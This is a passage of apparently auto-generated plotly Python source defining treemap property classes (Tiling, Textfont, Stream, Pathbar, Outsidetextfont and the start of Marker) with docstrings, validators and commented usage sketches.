Returns
-------
int|float
"""
return self["pad"]
@pad.setter
def pad(self, val):
self["pad"] = val
# squarifyratio
# -------------
@property
def squarifyratio(self):
"""
When using "squarify" `packing` algorithm, according to https:/
/github.com/d3/d3-hierarchy/blob/master/README.md#squarify_rati
o this option specifies the desired aspect ratio of the
generated rectangles. The ratio must be specified as a number
greater than or equal to one. Note that the orientation of the
generated rectangles (tall or wide) is not implied by the
ratio; for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is either 2:1 or
1:2. When using "squarify", unlike d3 which uses the Golden
Ratio i.e. 1.618034, Plotly applies 1 to increase squares in
treemap layouts.
The 'squarifyratio' property is a number and may be specified as:
- An int or float in the interval [1, inf]
Returns
-------
int|float
"""
return self["squarifyratio"]
@squarifyratio.setter
def squarifyratio(self, val):
self["squarifyratio"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
flip
Determines if the positions obtained from solver are
flipped on each axis.
packing
Determines d3 treemap solver. For more info please
refer to https://github.com/d3/d3-hierarchy#treemap-
tiling
pad
Sets the inner padding (in px).
squarifyratio
When using "squarify" `packing` algorithm, according to
https://github.com/d3/d3-hierarchy/blob/master/README.m
d#squarify_ratio this option specifies the desired
aspect ratio of the generated rectangles. The ratio
must be specified as a number greater than or equal to
one. Note that the orientation of the generated
rectangles (tall or wide) is not implied by the ratio;
for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is
either 2:1 or 1:2. When using "squarify", unlike d3
which uses the Golden Ratio i.e. 1.618034, Plotly
applies 1 to increase squares in treemap layouts.
"""
def __init__(
self, arg=None, flip=None, packing=None, pad=None, squarifyratio=None, **kwargs
):
"""
Construct a new Tiling object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Tiling
flip
Determines if the positions obtained from solver are
flipped on each axis.
packing
Determines d3 treemap solver. For more info please
refer to https://github.com/d3/d3-hierarchy#treemap-
tiling
pad
Sets the inner padding (in px).
squarifyratio
When using "squarify" `packing` algorithm, according to
https://github.com/d3/d3-hierarchy/blob/master/README.m
d#squarify_ratio this option specifies the desired
aspect ratio of the generated rectangles. The ratio
must be specified as a number greater than or equal to
one. Note that the orientation of the generated
rectangles (tall or wide) is not implied by the ratio;
for example, a ratio of two will attempt to produce a
mixture of rectangles whose width:height ratio is
either 2:1 or 1:2. When using "squarify", unlike d3
which uses the Golden Ratio i.e. 1.618034, Plotly
applies 1 to increase squares in treemap layouts.
Returns
-------
Tiling
"""
super(Tiling, self).__init__("tiling")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Tiling
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Tiling"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import tiling as v_tiling
# Initialize validators
# ---------------------
self._validators["flip"] = v_tiling.FlipValidator()
self._validators["packing"] = v_tiling.PackingValidator()
self._validators["pad"] = v_tiling.PadValidator()
self._validators["squarifyratio"] = v_tiling.SquarifyratioValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("flip", None)
self["flip"] = flip if flip is not None else _v
_v = arg.pop("packing", None)
self["packing"] = packing if packing is not None else _v
_v = arg.pop("pad", None)
self["pad"] = pad if pad is not None else _v
_v = arg.pop("squarifyratio", None)
self["squarifyratio"] = squarifyratio if squarifyratio is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
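# Usage sketch (illustrative, not part of the generated module):
# configuring the tiling solver on a treemap trace. Assumes a plotly
# version that ships the treemap trace; the labels/parents below are
# hypothetical sample data.
#
#     import plotly.graph_objects as go
#
#     fig = go.Figure(
#         go.Treemap(
#             labels=["root", "A", "B", "C"],
#             parents=["", "root", "root", "A"],
#             tiling=go.treemap.Tiling(
#                 packing="squarify",  # d3 tiling solver
#                 squarifyratio=1.0,   # favor square-like rectangles
#                 pad=3,               # inner padding in px
#             ),
#         )
#     )
#     fig.show()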
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Textfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on plot.ly for color .
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on plot.ly for family .
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on plot.ly for size .
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Textfont object
Sets the font used for `textinfo`.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Textfont
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
Returns
-------
Textfont
"""
super(Textfont, self).__init__("textfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Textfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Textfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import textfont as v_textfont
# Initialize validators
# ---------------------
self._validators["color"] = v_textfont.ColorValidator()
self._validators["colorsrc"] = v_textfont.ColorsrcValidator()
self._validators["family"] = v_textfont.FamilyValidator()
self._validators["familysrc"] = v_textfont.FamilysrcValidator()
self._validators["size"] = v_textfont.SizeValidator()
self._validators["sizesrc"] = v_textfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
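# Usage sketch (illustrative): styling the `textinfo` text with a
# Textfont. Assumes plotly is installed; the sample data and values
# below are hypothetical.
#
#     import plotly.graph_objects as go
#
#     trace = go.Treemap(
#         labels=["root", "A", "B"],
#         parents=["", "root", "root"],
#         textfont=go.treemap.Textfont(
#             family="Open Sans, Arial",  # comma-separated fallback list
#             size=14,
#             color="#444444",
#         ),
#     )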
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Stream(_BaseTraceHierarchyType):
# maxpoints
# ---------
@property
def maxpoints(self):
"""
Sets the maximum number of points to keep on the plots from an
incoming stream. If `maxpoints` is set to 50, only the newest
50 points will be displayed on the plot.
The 'maxpoints' property is a number and may be specified as:
- An int or float in the interval [0, 10000]
Returns
-------
int|float
"""
return self["maxpoints"]
@maxpoints.setter
def maxpoints(self, val):
self["maxpoints"] = val
# token
# -----
@property
def token(self):
"""
The stream id number links a data trace on a plot with a
stream. See https://plot.ly/settings for more details.
The 'token' property is a string and must be specified as:
- A non-empty string
Returns
-------
str
"""
return self["token"]
@token.setter
def token(self, val):
self["token"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
maxpoints
Sets the maximum number of points to keep on the plots
from an incoming stream. If `maxpoints` is set to 50,
only the newest 50 points will be displayed on the
plot.
token
The stream id number links a data trace on a plot with
a stream. See https://plot.ly/settings for more
details.
"""
def __init__(self, arg=None, maxpoints=None, token=None, **kwargs):
"""
Construct a new Stream object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Stream
maxpoints
Sets the maximum number of points to keep on the plots
from an incoming stream. If `maxpoints` is set to 50,
only the newest 50 points will be displayed on the
plot.
token
The stream id number links a data trace on a plot with
a stream. See https://plot.ly/settings for more
details.
Returns
-------
Stream
"""
super(Stream, self).__init__("stream")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Stream
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Stream"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import stream as v_stream
# Initialize validators
# ---------------------
self._validators["maxpoints"] = v_stream.MaxpointsValidator()
self._validators["token"] = v_stream.TokenValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("maxpoints", None)
self["maxpoints"] = maxpoints if maxpoints is not None else _v
_v = arg.pop("token", None)
self["token"] = token if token is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
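# Usage sketch (illustrative): attaching a stream to a treemap trace.
# The token below is a hypothetical placeholder; real tokens come from
# the https://plot.ly/settings page referenced above.
#
#     import plotly.graph_objects as go
#
#     trace = go.Treemap(
#         labels=["root", "A"],
#         parents=["", "root"],
#         stream=go.treemap.Stream(
#             token="YOUR-STREAM-TOKEN",  # placeholder, not a real token
#             maxpoints=100,              # keep only the newest 100 points
#         ),
#     )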
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Pathbar(_BaseTraceHierarchyType):
# edgeshape
# ---------
@property
def edgeshape(self):
"""
Determines which shape is used for edges between `pathbar`
labels.
The 'edgeshape' property is an enumeration that may be specified as:
- One of the following enumeration values:
['>', '<', '|', '\\']
- A string that matches one of the following regular expressions:
['']
Returns
-------
Any
"""
return self["edgeshape"]
@edgeshape.setter
def edgeshape(self, val):
self["edgeshape"] = val
# side
# ----
@property
def side(self):
"""
Determines on which side of the treemap the `pathbar`
should be presented.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['top', 'bottom']
Returns
-------
Any
"""
return self["side"]
@side.setter
def side(self, val):
self["side"] = val
# textfont
# --------
@property
def textfont(self):
"""
Sets the font used inside `pathbar`.
The 'textfont' property is an instance of Textfont
that may be specified as:
- An instance of plotly.graph_objs.treemap.pathbar.Textfont
- A dict of string/value properties that will be passed
to the Textfont constructor
Supported dict properties:
color
colorsrc
Sets the source reference on plot.ly for color
.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for
family .
size
sizesrc
Sets the source reference on plot.ly for size
.
Returns
-------
plotly.graph_objs.treemap.pathbar.Textfont
"""
return self["textfont"]
@textfont.setter
def textfont(self, val):
self["textfont"] = val
# thickness
# ---------
@property
def thickness(self):
"""
Sets the thickness of `pathbar` (in px). If not specified, the
`pathbar.textfont.size` is used with 3 pixels extra padding on
each side.
The 'thickness' property is a number and may be specified as:
- An int or float in the interval [12, inf]
Returns
-------
int|float
"""
return self["thickness"]
@thickness.setter
def thickness(self, val):
self["thickness"] = val
# visible
# -------
@property
def visible(self):
"""
Determines if the path bar is drawn i.e. outside the trace
`domain` and with one pixel gap.
The 'visible' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["visible"]
@visible.setter
def visible(self, val):
self["visible"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
edgeshape
Determines which shape is used for edges between
`pathbar` labels.
side
Determines on which side of the treemap the
`pathbar` should be presented.
textfont
Sets the font used inside `pathbar`.
thickness
Sets the thickness of `pathbar` (in px). If not
specified, the `pathbar.textfont.size` is used with 3
pixels extra padding on each side.
visible
Determines if the path bar is drawn i.e. outside the
trace `domain` and with one pixel gap.
"""
def __init__(
self,
arg=None,
edgeshape=None,
side=None,
textfont=None,
thickness=None,
visible=None,
**kwargs
):
"""
Construct a new Pathbar object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Pathbar
edgeshape
Determines which shape is used for edges between
`pathbar` labels.
side
Determines on which side of the treemap the
`pathbar` should be presented.
textfont
Sets the font used inside `pathbar`.
thickness
Sets the thickness of `pathbar` (in px). If not
specified, the `pathbar.textfont.size` is used with 3
pixels extra padding on each side.
visible
Determines if the path bar is drawn i.e. outside the
trace `domain` and with one pixel gap.
Returns
-------
Pathbar
"""
super(Pathbar, self).__init__("pathbar")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Pathbar
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Pathbar"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import pathbar as v_pathbar
# Initialize validators
# ---------------------
self._validators["edgeshape"] = v_pathbar.EdgeshapeValidator()
self._validators["side"] = v_pathbar.SideValidator()
self._validators["textfont"] = v_pathbar.TextfontValidator()
self._validators["thickness"] = v_pathbar.ThicknessValidator()
self._validators["visible"] = v_pathbar.VisibleValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("edgeshape", None)
self["edgeshape"] = edgeshape if edgeshape is not None else _v
_v = arg.pop("side", None)
self["side"] = side if side is not None else _v
_v = arg.pop("textfont", None)
self["textfont"] = textfont if textfont is not None else _v
_v = arg.pop("thickness", None)
self["thickness"] = thickness if thickness is not None else _v
_v = arg.pop("visible", None)
self["visible"] = visible if visible is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
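# Usage sketch (illustrative): enabling and styling the pathbar that is
# drawn above (or below) the treemap during drill-down. Sample data is
# hypothetical.
#
#     import plotly.graph_objects as go
#
#     trace = go.Treemap(
#         labels=["root", "A", "B"],
#         parents=["", "root", "root"],
#         pathbar=go.treemap.Pathbar(
#             visible=True,
#             side="top",
#             edgeshape=">",  # arrow-like edges between pathbar labels
#             thickness=20,   # in px; values below 12 are not accepted
#         ),
#     )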
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Outsidetextfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on plot.ly for color .
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on plot.ly for family .
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on plot.ly for size .
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Outsidetextfont object
Sets the font used for `textinfo` lying outside the sector.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
plotly.graph_objs.treemap.Outsidetextfont
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
Returns
-------
Outsidetextfont
"""
super(Outsidetextfont, self).__init__("outsidetextfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Outsidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Outsidetextfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import outsidetextfont as v_outsidetextfont
# Initialize validators
# ---------------------
self._validators["color"] = v_outsidetextfont.ColorValidator()
self._validators["colorsrc"] = v_outsidetextfont.ColorsrcValidator()
self._validators["family"] = v_outsidetextfont.FamilyValidator()
self._validators["familysrc"] = v_outsidetextfont.FamilysrcValidator()
self._validators["size"] = v_outsidetextfont.SizeValidator()
self._validators["sizesrc"] = v_outsidetextfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
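# Usage sketch (illustrative): text lying outside the sectors can be
# styled independently of the inside text. Assumes plotly is installed;
# values are hypothetical.
#
#     import plotly.graph_objects as go
#
#     trace = go.Treemap(
#         labels=["root", "A", "B"],
#         parents=["", "root", "root"],
#         outsidetextfont=go.treemap.Outsidetextfont(size=12, color="gray"),
#         textfont=go.treemap.Textfont(size=16),
#     )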
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Marker(_BaseTraceHierarchyType):
# autocolorscale
# --------------
@property
def autocolorscale(self):
"""
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colors is set to a
numerical array. In case `colorscale` is unspecified or
`autocolorscale` is true, the default palette will be chosen
according to whether numbers in the `color` array are all
positive, all negative or mixed.
The 'autocolorscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["autocolorscale"]
@autocolorscale.setter
def autocolorscale(self, val):
self["autocolorscale"] = val
# cauto
# -----
@property
def cauto(self):
"""
Determines whether or not the color domain is computed with
respect to the input data (here colors) or the bounds set in
`marker.cmin` and `marker.cmax`. Has an effect only if colors is
set to a numerical array. Defaults to `false` when
`marker.cmin` and `marker.cmax` are set by the user.
The 'cauto' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["cauto"]
@cauto.setter
def cauto(self, val):
self["cauto"] = val
# cmax
# ----
@property
def cmax(self):
"""
Sets the upper bound of the color domain. Has an effect only if
colors is set to a numerical array. Value should have the same
units as colors and if set, `marker.cmin` must be set as well.
The 'cmax' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmax"]
@cmax.setter
def cmax(self, val):
self["cmax"] = val
# cmid
# ----
@property
def cmid(self):
"""
Sets the mid-point of the color domain by scaling `marker.cmin`
and/or `marker.cmax` to be equidistant to this point. Has an
effect only if colors is set to a numerical array. Value should
have the same units as colors. Has no effect when
`marker.cauto` is `false`.
The 'cmid' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmid"]
@cmid.setter
def cmid(self, val):
self["cmid"] = val
# cmin
# ----
@property
def cmin(self):
"""
Sets the lower bound of the color domain. Has an effect only if
colors is set to a numerical array. Value should have the same
units as colors and if set, `marker.cmax` must be set as well.
The 'cmin' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["cmin"]
@cmin.setter
def cmin(self, val):
self["cmin"] = val
# coloraxis
# ---------
@property
